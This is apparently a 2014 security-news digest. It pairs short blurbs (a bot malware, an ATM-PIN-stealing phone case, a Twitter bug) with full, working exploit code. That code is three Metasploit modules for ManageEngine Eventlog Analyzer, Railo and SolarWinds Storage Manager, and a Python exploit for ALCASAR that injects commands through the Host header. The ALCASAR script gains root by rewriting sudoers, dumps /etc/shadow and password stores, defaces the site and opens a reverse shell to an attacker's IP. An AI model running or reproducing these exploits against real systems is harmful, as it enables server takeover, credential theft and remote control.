
[Honeypot Alert] New Bot Malware (BoSSaBoTv2) Attacking Web Servers Discovered

Our web honeypots picked up some interesting attack traffic. The initial web application attack vector (a PHP-CGI vulnerability) is not new, but the malware payload is. We wanted to get this information out to the community quickly because of the following combined threat elements:

Active exploit attempts to upload/install the malware
The overall low detection rates among AV vendors
The malware is actively being sold in underground forums

More here: http://blog.spiderlabs.com/2014/09/honeypot-alert-bossabotv2-irc-botnetbitcoin-mining-analysis.html

This Simple iPhone Case can be Used to Steal ATM PINs

It’s a common wisecrack around the criminal community. This whole stealing-ATM-PINs thing would be a lot simpler if a gadget would just do all the work.

Sounds like a crazy dream, right?

After all, what thief wouldn’t love to steal ATM PINs via a handheld device?

This dream, frighteningly for us, may just come true with what appears to be an ordinary iPhone case.


More here: http://www.intego.com/mac-security-blog/iphone-case-atm-pins/

Metasploit: ManageEngine Eventlog Analyzer Arbitrary File Upload

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'ManageEngine Eventlog Analyzer Arbitrary File Upload',
      'Description' => %q{
        This module exploits a file upload vulnerability in ManageEngine Eventlog Analyzer.
        The vulnerability exists in the agentUpload servlet which accepts unauthenticated
        file uploads and handles zip file contents in an insecure way. By combining both
        weaknesses a remote attacker can achieve remote code execution. This module has been
        tested successfully on versions v7.0 - v9.9 b9002 in Windows and Linux. Versions
        between 7.0 and < 8.1 are only exploitable via EAR deployment in the JBoss server,
        while versions 8.1+ are only exploitable via a JSP upload.
      },
      'Author'       =>
        [
          'h0ng10',                              # Vulnerability discovery
          'Pedro Ribeiro <pedrib[at]gmail.com>' # Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2014-6037' ],
          [ 'OSVDB', '110642' ],
          [ 'URL', 'https://www.mogwaisecurity.de/advisories/MSA-2014-01.txt' ],
          [ 'URL', 'http://seclists.org/fulldisclosure/2014/Aug/86' ]
        ],
      'DefaultOptions' => { 'WfsDelay' => 5 },
      'Privileged'  => false,            # Privileged on Windows but not on Linux targets
      'Platform'    => %w{ java linux win },
      'Targets'     =>
        [
          [ 'Automatic', { } ],
          [ 'Eventlog Analyzer v7.0 - v8.0 / Java universal',
            {
              'Platform' => 'java',
              'Arch' => ARCH_JAVA,
              'WfsDelay' => 30
            }
          ],
          [ 'Eventlog Analyzer v8.1 - v9.9 b9002 / Windows',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ],
          [ 'Eventlog Analyzer v8.1 - v9.9 b9002 / Linux',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Aug 31 2014'))

    register_options(
      [
        Opt::RPORT(8400),
        OptInt.new('SLEEP',
          [true, 'Seconds to sleep while we wait for EAR deployment (Java target only)', 15]),
      ], self.class)
  end


  def get_version
    res = send_request_cgi({
      'uri'    => normalize_uri("event/index3.do"),
      'method' => 'GET'
    })

    if res and res.code == 200
      if res.body =~ /ManageEngine EventLog Analyzer ([0-9]{1})/
        return $1
      end
    end

    return "0"
  end


  def check
    version = get_version
    if version >= "7" and version <= "9"
      # version 7 to < 8.1 detection
      res = send_request_cgi({
        'uri'    => normalize_uri("event/agentUpload"),
        'method' => 'GET'
      })
      if res and res.code == 405
        return Exploit::CheckCode::Appears
      end

      # version 8.1+ detection
      res = send_request_cgi({
        'uri'    => normalize_uri("agentUpload"),
        'method' => 'GET'
      })
      # get_version returns a String, so compare against "8", not the Integer 8
      if res and res.code == 405 and version == "8"
        return Exploit::CheckCode::Appears
      else
        # We can't be sure that it is vulnerable in version 9
        return Exploit::CheckCode::Detected
      end

    else
      return Exploit::CheckCode::Safe
    end
  end


  def create_zip_and_upload(payload, target_path, is_payload = true)
    # Zipping with CM_STORE to avoid errors decompressing the zip
    # in the Java vulnerable application
    zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
    zip.add_file(target_path, payload)

    post_data = Rex::MIME::Message.new
    post_data.add_part(zip.pack, "application/zip", 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{Rex::Text.rand_text_alpha(4+rand(4))}.zip\"")

    data = post_data.to_s

    if is_payload
      print_status("#{peer} - Uploading payload...")
    end
    res = send_request_cgi({
      'uri'    => (@my_target == targets[1] ? normalize_uri("/event/agentUpload") : normalize_uri("agentUpload")),
      'method' => 'POST',
      'data'   => data,
      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}"
    })

    if res and res.code == 200 and res.body.empty?
      if is_payload
        print_status("#{peer} - Payload uploaded successfully")
      end
      register_files_for_cleanup(target_path.gsub("../../", "../"))
      return true
    else
      return false
    end
  end


  def pick_target
    return target if target.name != 'Automatic'

    print_status("#{peer} - Determining target")

    version = get_version

    if version == "7"
      return targets[1]
    end

    os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body></html>}
    jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
    target_dir = "../../webapps/event/"
    if not create_zip_and_upload(os_finder_payload, target_dir + jsp_name, false)
      if version == "8"
        # Versions < 8.1 do not have a Java compiler, but can be exploited via the EAR method
        return targets[1]
      end
      return nil
    end

    res = send_request_cgi({
      'uri'    => normalize_uri(jsp_name),
      'method' => 'GET'
    })

    if res and res.code == 200
      if res.body.to_s =~ /Windows/
        return targets[2]
      else
        # assuming Linux
        return targets[3]
      end
    end

    return nil
  end


  def generate_jsp_payload
    opts = {:arch => @my_target.arch, :platform => @my_target.platform}
    payload = exploit_regenerate_payload(@my_target.platform, @my_target.arch)
    exe = generate_payload_exe(opts)
    base64_exe = Rex::Text.encode_base64(exe)

    native_payload_name = rand_text_alpha(rand(6)+3)
    ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin'

    var_raw     = rand_text_alpha(rand(8) + 3)
    var_ostream = rand_text_alpha(rand(8) + 3)
    var_buf     = rand_text_alpha(rand(8) + 3)
    var_decoder = rand_text_alpha(rand(8) + 3)
    var_tmp     = rand_text_alpha(rand(8) + 3)
    var_path    = rand_text_alpha(rand(8) + 3)
    var_proc2   = rand_text_alpha(rand(8) + 3)

    if @my_target['Platform'] == 'linux'
      var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3)
      chmod = %Q|
      Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path});
      Thread.sleep(200);
      |

      var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3)
      cleanup = %Q|
      Thread.sleep(200);
      Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path});
      |
    else
      chmod = ''
      cleanup = ''
    end

    jsp = %Q|
    <%@page import="java.io.*"%>
    <%@page import="sun.misc.BASE64Decoder"%>
    <%
    try {
      String #{var_buf} = "#{base64_exe}";
      BASE64Decoder #{var_decoder} = new BASE64Decoder();
      byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());

      File #{var_tmp} = File.createTempFile("#{native_payload_name}", "#{ext}");
      String #{var_path} = #{var_tmp}.getAbsolutePath();

      BufferedOutputStream #{var_ostream} =
        new BufferedOutputStream(new FileOutputStream(#{var_path}));
      #{var_ostream}.write(#{var_raw});
      #{var_ostream}.close();
      #{chmod}
      Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});
      #{cleanup}
    } catch (Exception e) {
    }
    %>
    |

    jsp = jsp.gsub(/\n/, '')
    jsp = jsp.gsub(/\t/, '')
    jsp = jsp.gsub(/\x0d\x0a/, "")
    jsp = jsp.gsub(/\x0a/, "")

    return jsp
  end


  def exploit_native
    # When using auto targeting, MSF selects the Windows meterpreter as the default payload.
    # Fail if this is the case and ask the user to select an appropriate payload.
    if @my_target['Platform'] == 'linux' and payload_instance.name =~ /Windows/
      fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Linux target.")
    end

    jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
    target_dir = "../../webapps/event/"

    jsp_payload = generate_jsp_payload
    if not create_zip_and_upload(jsp_payload, target_dir + jsp_name)
      fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
    end

    return jsp_name
  end


  def exploit_java
    # When using auto targeting, MSF selects the Windows meterpreter as the default payload.
    # Fail if this is the case and ask the user to select an appropriate payload.
    if @my_target['Platform'] == 'java' and not payload_instance.name =~ /Java/
      fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Java target.")
    end

    target_dir = "../../server/default/deploy/"

    # First we generate the WAR with the payload...
    war_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
    war_payload = payload.encoded_war({ :app_name => war_app_base })

    # ... and then we create an EAR file that will contain it.
    ear_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
    app_xml = %Q{<?xml version="1.0" encoding="UTF-8"?><application><display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name><module><web><web-uri>#{war_app_base + ".war"}</web-uri><context-root>/#{ear_app_base}</context-root></web></module></application>}

    # Zipping with CM_STORE to avoid errors while decompressing the zip
    # in the Java vulnerable application
    ear_file = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
    ear_file.add_file(war_app_base + ".war", war_payload.to_s)
    ear_file.add_file("META-INF/application.xml", app_xml)
    ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + ".ear"

    if not create_zip_and_upload(ear_file.pack, target_dir + ear_file_name)
      fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
    end

    print_status("#{peer} - Waiting " + datastore['SLEEP'].to_s + " seconds for EAR deployment...")
    sleep(datastore['SLEEP'])
    return normalize_uri(ear_app_base, war_app_base, rand_text_alphanumeric(4 + rand(32 - 4)))
  end


  def exploit
    if datastore['SLEEP'] < 0
      print_error("The SLEEP datastore option shouldn't be negative")
      return
    end

    @my_target = pick_target
    if @my_target.nil?
      print_error("#{peer} - Unable to select a target, we must bail.")
      return
    else
      print_status("#{peer} - Selected target #{@my_target.name}")
    end

    if @my_target == targets[1]
      exploit_path = exploit_java
    else
      exploit_path = exploit_native
    end

    print_status("#{peer} - Executing payload...")
    send_request_cgi({
      'uri'    => normalize_uri(exploit_path),
      'method' => 'GET'
    })
  end
end



//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Metasploit: Railo Remote File Include

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(update_info(info,
                      'Name' => 'Railo Remote File Include',
                      'Description' => %q{
                        This module exploits a remote file include vulnerability in Railo,
                        tested against version 4.2.1. First, a call using a vulnerable
                        <cffile> line in thumbnail.cfm allows an attacker to download an
                        arbitrary PNG file. By appending a .cfm, and taking advantage of
                        a directory traversal, an attacker can append cold fusion markup
                        to the PNG file, and have it interpreted by the server. This is
                        used to stage and execute a fully-fledged payload.
                      },
                      'License' => MSF_LICENSE,
                      'Author' => [
                        'Bryan Alexander <drone@ballastsecurity.net>', # Discovery/PoC
                        'bperry' # metasploited
                      ],
                      'References' => [
                        ['CVE', '2014-5468'],
                        ['URL', 'http://hatriot.github.io/blog/2014/08/27/railo-security-part-four/']
                      ],
                      'Payload' => {
                        'Space' => 99999, # if there is disk space, I think we will fit
                        'BadChars' => "",
                        'DisableNops' => true,
                        'Compat' => {
                          'PayloadType' => 'cmd',
                          'RequiredCmd' => 'generic netcat perl ruby python bash telnet'
                        }
                      },
                      'Platform' => %w(unix),
                      'Targets' =>
                      [
                        [
                          'Automatic',
                          {
                            'Platform' => [ 'unix' ],
                            'Arch' => ARCH_CMD
                          }
                        ]
                      ],
                      'DefaultTarget' => 0,
                      'DisclosureDate' => 'Aug 26 2014'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base URI of the Railo server', '/railo-context/']),
        OptInt.new('STAGEWAIT', [true, 'Number of seconds to wait for stager to download', 10])
      ], self.class)
  end

  def check
    md5 = '6de48cb72421cfabdce440077a921b25' # /res/images/id.png

    res = send_request_cgi(
      'uri' => normalize_uri('res', 'images', 'id.png') # the targeturi is not used in this request
    )

    if !res
      fail_with(Failure::Unknown, 'Server did not respond')
    elsif !res.body
      fail_with(Failure::Unknown, "Server responded without a body: #{res.code} #{res.message}")
    end

    new_md5 = Rex::Text.md5(res.body)

    return Exploit::CheckCode::Appears if new_md5 == md5

    Exploit::CheckCode::Safe
  end

  def exploit
    if datastore['SRVHOST'] == '0.0.0.0'
      fail_with(Failure::BadConfig, 'SRVHOST must be an IP address accessible from another computer')
    end

    url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s

    @shell_name = Rex::Text.rand_text_alpha(15)
    stager_name = Rex::Text.rand_text_alpha(15) + '.cfm'

    start_service('Uri' => {
                    'Proc' => proc do |cli, req|
                      on_request_stager(cli, req)
                    end,
                    'Path' => '/' + stager_name
                  })

    start_service('Uri' => {
                    'Proc' => proc do |cli, req|
                      on_request_shell(cli, req)
                    end,
                    'Path' => '/' + @shell_name
                  })

    wh = '5000' # width and height

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'admin', 'thumbnail.cfm'),
      'vars_get' => {
        'img' => url + '/' + stager_name,
        'height' => wh,
        'width' => wh
      }
    )

    if !res
      fail_with(Failure::Unknown, 'Server did not respond')
    elsif res.code != 500
      fail_with(Failure::Unknown, "Server did not respond with the expected HTTP 500: #{res.code} #{res.message}")
    end

    print_status('Waiting for first stage to download...')

    i = datastore['STAGEWAIT']
    while !@staged && i > 0
      select(nil, nil, nil, 1)
      print_status("Waiting for #{i} more seconds...")
      i = i - 1
    end

    @staged = false

    if i == 0
      fail_with(Failure::Unknown, 'Server did not request the stager.')
    end

    hash = Rex::Text.md5("#{url + "/" + stager_name}-#{wh}-#{wh}") # 5000 is width and height from GET

    hash.upcase!

    print_status('Executing stager')

    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'admin', 'img.cfm'),
      'vars_get' => {
        'attributes.src' => '../../../../temp/admin-ext-thumbnails/' + hash,
        'thistag.executionmode' => 'start'
      }
    )
  end

  def on_request_shell(cli, _request)
    print_status('Sending payload')
    send_response(cli, payload.encoded, {})
    handler(cli)
  end

  def on_request_stager(cli, _request)
    url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + '/' + @shell_name

    stager = "<cfhttp method='get' url='#{url}'"
    stager << " path='#GetDirectoryFromPath(GetCurrentTemplatePath())#..\\..\\..\\..\\..\\..\\'"
    stager << " file='#{@shell_name}'>"
    stager << "<cfexecute name='sh' arguments='#{@shell_name}' timeout='99999'></cfexecute>"

    png = 'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcS'
    png << 'JAAAACklEQVR4nGMAAQAABQABDQottAAAAABJRU5ErkJggg=='

    # A very small PNG file
    png = Rex::Text.decode_base64(png)

    stager.each_byte do |b|
      png << b
    end

    png << 0x00

    print_status('Sending stage. This might be sent multiple times.')
    send_response(cli, png,  'Content-Type' => 'image/png')

    @staged = true

    handler(cli)
  end
end




Metasploit: SolarWinds Storage Manager Authentication Bypass

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'SolarWinds Storage Manager Authentication Bypass',
      'Description' => %q{
        This module exploits an authentication bypass vulnerability in Solarwinds Storage Manager.
        The vulnerability exists in the AuthenticationFilter, which allows authentication to be
        bypassed with specially crafted URLs. After bypassing authentication, it is possible to use
        a file upload function to achieve remote code execution. This module has been tested
        successfully on Solarwinds Storage Manager Server 5.1.0 and 5.7.1 on Windows 32-bit,
        Windows 64-bit and Linux 64-bit operating systems.
      },
      'Author'       =>
        [
          'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
          'juan vazquez' # Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['ZDI', '14-299']
        ],
      'Privileged'  => true,
      'Platform'       => %w{ linux win },
      'Arch'        => ARCH_JAVA,
      'Targets'     =>
        [
          ['Solarwinds Storage Manager <= 5.7.1', {}]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Aug 19 2014'))

    register_options(
      [
        Opt::RPORT(9000)
      ], self.class)
  end

  def check
    res = send_request_cgi({
      'uri'    => normalize_uri("/", "images", "..", "jsp", "ProcessFileUpload.jsp"),
      'method' => 'POST',
      'ctype'  => "multipart/form-data; boundary=----#{rand_text_alpha(10 + rand(10))}"
    })

    if  res && res.code == 200 && res.body && res.body.to_s =~ /Upload Successful!!/
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    jsp_info = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
    print_status("#{peer} - Uploading Information Gathering JSP #{jsp_info}...")
    if upload(jsp_info, jsp_path)
      print_good("#{peer} - JSP payload uploaded successfully")
    else
      fail_with(Failure::Unknown, "#{peer} - Information Gathering JSP upload failed")
    end

    res = execute(jsp_info)

    if res && res.code == 200 && res.body.to_s =~ /Path:(.*)/
      upload_path = $1
      print_good("#{peer} - Working directory found in #{upload_path}")
      register_file_for_cleanup(::File.join(upload_path, jsp_info))
    else
      print_error("#{peer} - Couldn't retrieve the upload directory, manual cleanup will be required")
      print_warning("#{peer} - #{jsp_info} needs to be deleted manually")
    end

    jsp_payload = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
    print_status("#{peer} - Uploading JSP payload #{jsp_payload}...")
    if upload(jsp_payload, payload.encoded)
      print_good("#{peer} - JSP payload uploaded successfully")
    else
      fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed")
    end

    if upload_path
      register_file_for_cleanup(::File.join(upload_path, jsp_payload))
    else
      print_warning("#{peer} - #{jsp_payload} needs to be deleted manually")
    end

    print_status("#{peer} - Executing payload...")
    execute(jsp_payload, 1)
  end

  def execute(jsp_name, time_out = 20)
    res = send_request_cgi({
      'uri'    => normalize_uri("/", "images", "..", jsp_name),
      'method' => 'GET'
    }, time_out)

    res
  end

  def upload(file_name, contents)
    post_data = Rex::MIME::Message.new
    post_data.add_part(contents,
                       "application/octet-stream",
                       nil,
                       "form-data; name=\"#{rand_text_alpha(4 + rand(4))}\"; filename=\"#{file_name}\"")

    res = send_request_cgi({
      'uri'    => normalize_uri("/", "images", "..", "jsp", "ProcessFileUpload.jsp"),
      'method' => 'POST',
      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
      'data'   => post_data.to_s
    })

    if  res && res.code == 200 && res.body && res.body.to_s =~ /Upload Successful!!/
      return true
    end

    false
  end

  def jsp_path
    jsp =<<-EOS
<%@ page language="Java" import="java.util.*"%>
<%
out.println("Path:" + System.getProperty("server.webapp.root"));
%>
    EOS

    jsp
  end

end






Google DNS Server IP Address Spoofed for SNMP reflective Attacks

Thanks to James for sending us some packets. Unlike suggested earlier, this doesn't look like a DoS against Google, but more like a DoS against vulnerable gateways. The SNMP command is actually a "set" command using the default read-write community string "private".

More here: https://isc.sans.edu/diary/Google+DNS+Server+IP+Address+Spoofed+for+SNMP+reflective+Attacks/18647

Twitter Vulnerability Could Delete Credit Cards from Any Twitter Account

Hello everyone :)

Today I will write about a serious vulnerability I’ve found recently in Twitter.
So let me share the story with you.

The story started when I saw Twitter introducing their new bug bounty program and starting to pay money rewards; I decided to look for new bugs in Twitter and get paid.


At the first moment of hunting I successfully found a CSRF vulnerability that can add many followers in a single request and bypass the CSRF token protection, but unfortunately it was a duplicate issue.

I started looking again for some more critical bugs and I successfully found a serious logical vulnerability [insecure direct object reference] in ads.twitter.com that allowed me to delete credit cards from any Twitter account.

The impact of the vulnerability was very critical and high because all that’s needed to delete a credit card is to have the credit card identifier, which consists of only 6 numbers such as “220152″.

More here: http://www.secgeek.net/twitter-vulnerability/

Major Android Bug is a Privacy Disaster (CVE-2014-6041)

On the night of September 7, 2014, Joe Vennix of Rapid7's Metasploit Products team wrote, "I did not believe this at first, but after some testing it seems true: in AOSP browser before Android 4.4, you can load javascript into any arbitrary frame or window [...]" and provided a Metasploit module to exploit this condition. After some of the usual testing and confirmation of the vulnerability, this module is available in all versions of Metasploit.

More here: https://community.rapid7.com/community/metasploit/blog/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041

Wordfence v5.2.3 – 2 Stored XSS, Insufficient Logging, Throttle Bypass, Exploit Detection Bypass

Wordfence v5.2.3 suffers from multiple vulnerabilities including 2 stored XSS, insufficient logging of requests, being able to bypass the throttling feature (designed to limit scraping) and being able to bypass the exploit detection feature. All of these appear to be the result of a lack of understanding of PHP superglobals.

More here: https://vexatioustendencies.com/wordfence-v5-2-3-2-stored-xss-insufficient-logging-throttle-bypass-exploit-detection-bypass/

ALCASAR

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
####
#
#    ALCASAR <= 2.8.1 Remote Root Code Execution Vulnerability
#
#    Author: eF
#    Date  : 2014-09-12
#    URL   : http://www.alcasar.net/
#
#    This is not a responsible disclosure coz' I have no sense of ethics and I don't give a f*ck.
#
#        db         88           ,ad8888ba,         db         ad88888ba         db         88888888ba
#       d88b        88          d8"'    `"8b       d88b       d8"     "8b       d88b        88      "8b
#      d8'`8b       88         d8'                d8'`8b      Y8,              d8'`8b       88      ,8P
#     d8'  `8b      88         88                d8'  `8b     `Y8aaaaa,       d8'  `8b      88aaaaaa8P'
#    d8YaaaaY8b     88         88               d8YaaaaY8b      `"""""8b,    d8YaaaaY8b     88""""88'
#   d8""""""""8b    88         Y8,             d8""""""""8b           `8b   d8""""""""8b    88    `8b
#  d8'        `8b   88          Y8a.    .a8P  d8'        `8b  Y8a     a8P  d8'        `8b   88     `8b
# d8'          `8b  88888888888  `"Y8888Y"'  d8'          `8b  "Y88888P"  d8'          `8b  88      `8b
#
#
# ALCASAR is a free Network Access Controller which controls Internet access networks.
# It authenticates, attributes and protects users' access regardless of their connected equipment
# (PC, smartphone, game console, etc.).
#
# I recently released an exploit for ALCASAR 2.8 (ALCASAR <= 2.8 Remote Code Execution Vulnerability Root).
# As a reminder, it was a trivial code execution via an unfiltered exec() call:
#
#   $pattern = preg_replace('/www./','',$_SERVER['HTTP_HOST']);
#   exec("grep -Re ^$pattern$ /etc/dansguardian/lists/blacklists/*/domains|cut -d'/' -f6", $output);
#
# A few days later, a new version corrects the vulnerability. Or maybe not...
#
# At first, this is how ALCASAR's developers present the previous vulnerability:
#
# " A security hole has been discovered on ALCASAR V2.8 (only this version). This vulnerability allows a user "
# " connected on the LAN to retrieve a lot of data from the server. The ALCASAR team is testing few security  "
# " patches. A script that you could run on the active servers will be available on this forum ASAP. At that  "
# " time, the download version of ALCASAR will be incremented (V2.8.1) "
#
# ?!? This vulnerability allows a user connected on the LAN to *TOTALLY PWN* the server:
# Get a root shell, stop all services, sniff all connections, inject data in users' sessions, sniff passwords,
# bypass firewall rules, act as another user, etc.
# This is not just a matter of "retrieving a lot of data from the server".
#
# Not alerting users to the real criticality of a vulnerability is a very serious lack of security.
# Lying by saying that the vulnerability only affects version 2.8 while it also affects version 2.7 is another
# one.
#
# Now, the patch itself: it tries to correct the vulnerability by filtering the vulnerable input:
#
# $pattern = filter_var($pattern, FILTER_VALIDATE_URL) == false ? "" : $pattern;
#
# WTF?!
# First, I think that the application no longer works. By default, filter_var() is going to accept a URL
# only if its scheme is valid:
#
#   $ php -r 'var_dump(filter_var("www.google.com", FILTER_VALIDATE_URL));'
#     bool(false)
#   $ php -r 'var_dump(filter_var("http://www.google.com", FILTER_VALIDATE_URL));'
#     string(21) "http://www.google.com"
#
# But... we cannot put http:// in the HTTP host field, the HTTP server won't let us...
# Dev, did you try your patch?
# Instead, to execute code, it's quite easy to bypass this filtering using "mailto:email@valid.tld;cmd;"
# Service down, vulnerability still present: double fail.
#
# The privilege escalation in the previous exploit was using openssl, to gain reading and writing rights
# as root.
#
# The patch therefore removes openssl in the sudoers file (without changing the legitimate
# calls in the PHP code...). So let's use another method: systemctl is still callable via sudo...
#
# We can create a service with our command and start it as root:
#
# sudo systemctl link /tmp/pwn3d.service
# sudo systemctl start pwn3d.service
#
# Conclusion: triple fail.
#
# Wouldn't a "head of information systems security for a major command" need a
# little training on secure PHP development?
#
# On ALCASAR website:
#
# "The security of the portal has been worked out like a bastion in order to resist to different
# kinds of threat"
#
# LOLZ!!! Remote Root Code Execution does not seem to be part of these "different kinds of threat".
#
# ALCASAR is not built with security in mind. Apache user can sudo, there is no chroot, no separation,
# the PHP code is dreadful, some passwords are unnecessarily stored in plaintext, the function to
# generate user passwords is weak, there are no system updates (the kernel is out of date, from Jul 4 2013),
# etc.
#
# Development is not really open either: there is no bugtracker, no trac, no way to see what has been
# patched, etc. If the elementary rules of open source development had been met, a user could have
# prevented this 2.8.1 patch from being crap.
#
#
####

import sys, os, re, httplib

class PWN_Alcasar:

    def __init__(self, host):
        self.host = host
        self.root = False

    def exec_cmd(self, cmd, output=False):
        tag = os.urandom(4).encode('hex')

        cmd = 'bash -c "%s" 2>&1' % cmd.replace('"', '\\"')
        if self.root:
            cmd = 'sudo %s' % cmd

        wrapper = 'echo %s;echo %s|base64 -d -w0|sh|base64 -w0' % (tag, cmd.encode('base64').replace('\n',''))
        wrapper = wrapper.replace(' ', '${IFS}')
        headers = {
            'host' : 'mailto:eF@cosmic.nato;%s;#' % wrapper
        }

        c = httplib.HTTPConnection(self.host)
        c.request('GET', '/index.php', '', headers)
        r = c.getresponse()
        data = r.read()
        c.close()

        m = re.search(r'%s, (.*)\s</div>' % tag, data)
        if m:
            data = m.group(1).decode('base64')
            if output:
                print data
            return data
        return None

    def read_file(self, filepath, output=True):
        return self.exec_cmd('cat "%s"' % filepath, output=output)

    def read_passwords(self):
        self.read_file('/root/ALCASAR-passwords.txt')
        self.read_file('/etc/shadow')
        self.read_file('/usr/local/etc/digest/key_all')
        self.read_file('/usr/local/etc/digest/key_admin')
        self.read_file('/usr/local/etc/digest/key_backup')
        self.read_file('/usr/local/etc/digest/key_manager')
        self.read_file('/usr/local/etc/digest/key_only_admin')
        self.read_file('/usr/local/etc/digest/key_only_backup')
        self.read_file('/usr/local/etc/digest/key_only_manager')
        alcasar_mysql = self.read_file('/usr/local/sbin/alcasar-mysql.sh', output=False)
        if alcasar_mysql:
            m = re.search(r'radiuspwd="(.*)"', alcasar_mysql)
            if m:
                radiuspwd = m.group(1)
                sql = 'SELECT username,value FROM radcheck WHERE attribute like \'%%password%%\''
                self.exec_cmd('mysql -uradius -p\"%s\" radius -e "%s"' % (radiuspwd, sql), output=True)

    def edit_sudoers(self):
        service =  '[Unit]\n'
        service += 'Description=Just another ALCASAR lolcalr00t\n\n'
        service += '[Service]\n'
        service += 'Type=forking\n'
        service += 'KillMode=process\n'
        service += 'ExecStart=/bin/sh -c "sed -i s/BL,NF/BL,ALL,NF/g /etc/sudoers"\n'
        self.exec_cmd('echo %s | openssl base64 -d -out /tmp/Pwn3d.service -A' % service.encode('base64').replace('\n', ''))
        self.exec_cmd('sudo systemctl link /tmp/Pwn3d.service')
        self.exec_cmd('sudo systemctl start Pwn3d.service')
        # Use self (not the module-level 'exploit' object) and guard against a None result
        result = self.exec_cmd('sudo id')
        if result and 'uid=0' in result:
            self.root = True

    def reverse_shell(self, rip, rport='80'):
        payload = 'import socket,subprocess,os;'
        payload += 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'
        payload += 's.connect((\'%s\',%s));' % (rip, rport)
        payload += 'os.dup2(s.fileno(),0);'
        payload += 'os.dup2(s.fileno(),1);'
        payload += 'os.dup2(s.fileno(),2);'
        payload += 'p=subprocess.call([\'/bin/sh\',\'-i\']);'
        return self.exec_cmd('python -c "%s"' % payload)

    def lolz(self):
        old = 'http://www.wikipedia.org'
        new = 'https://www.youtube.com/watch\?v=Q-J0f1yF75Y'
        self.exec_cmd('sed -i s,%s,%s,g /var/www/html/index.php' % (old, new), True)

def usage():
    print 'Usage: %s host command (ip) (port)' % sys.argv[0]
    print '       "command" can be a shell command or "reverseshell"'
    sys.exit(0)

if __name__ == '__main__':

    print '#' * 80
    print '# ALCASAR <= 2.8.1 Remote Root Code Execution Vulnerability'
    print '# Author: eF'
    print '#' * 80

    if len(sys.argv) < 3:
        usage()

    cmd = sys.argv[2]
    if cmd == 'reverseshell':
        if len(sys.argv) < 5:
            print '[!] Need IP and port for the reverse shell...'
            sys.exit(0)
        rip = sys.argv[3]
        rport = sys.argv[4]

    exploit = PWN_Alcasar(sys.argv[1])
    print '[-] whoami (should be apache):'
    exploit.exec_cmd('id', output=True)
    print '[+] On the way to the uid 0...'
    exploit.edit_sudoers()
    print '[-] Got root?'
    exploit.exec_cmd('id', output=True)
    exploit.lolz()
    if exploit.root:
        print '[+] Here are some passwords for you (again):'
        exploit.read_passwords()
    if cmd == 'reverseshell':
        print '[+] You should now have a shell on %s:%s' % (rip, rport)
        exploit.reverse_shell(rip, rport)
    else:
        print '[+] Your command Sir:'
        exploit.exec_cmd(cmd, output=True)
    sys.exit(1)
